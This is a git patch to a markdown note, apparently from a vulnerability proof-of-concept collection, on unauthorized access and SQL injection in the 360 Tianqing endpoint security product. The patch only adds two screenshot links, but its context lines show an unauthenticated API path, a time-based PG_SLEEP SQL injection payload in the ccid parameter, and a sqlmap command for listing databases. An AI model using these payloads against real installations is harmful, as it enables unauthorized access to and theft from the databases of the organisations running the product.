From 524a2ed04c8e22a75f753122c3fd63bca9fe134c Mon Sep 17 00:00:00 2001
From: wy876 <139549762+wy876@users.noreply.github.com>
Date: Wed, 18 Oct 2023 18:41:08 +0800
Subject: [PATCH] =?UTF-8?q?Update=20360=E5=A4=A9=E6=93=8E=20-=20=E6=9C=AA?=
 =?UTF-8?q?=E6=8E=88=E6=9D=83=E4=B8=8Esql=E6=B3=A8=E5=85=A5.md?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

---
 360天擎 - 未授权与sql注入.md | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)

diff --git a/360天擎 - 未授权与sql注入.md b/360天擎 - 未授权与sql注入.md
index 7794664..f642f2d 100644
--- a/360天擎 - 未授权与sql注入.md	
+++ b/360天擎 - 未授权与sql注入.md	
@@ -11,7 +11,7 @@
 
 ### 未授权漏洞
 ```路由后拼接/api/dbstat/gettablessize```
-
+![](./assets/20231018183944.png)
 
 ### sql注入漏洞
 比较推荐的方式先测试是否存在数据库信息泄露，存在的话大概率存在SQL注入
@@ -20,5 +20,7 @@
 
 {{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1';SELECT PG_SLEEP(5)--
 ```
+![](./assets/20231018184057.png)
+
 ## sqlmap
 python .\sqlmap.py --batch -dbs -u https://{{Hostname}}/api/dp/rptsvcsyncpoint?ccid=1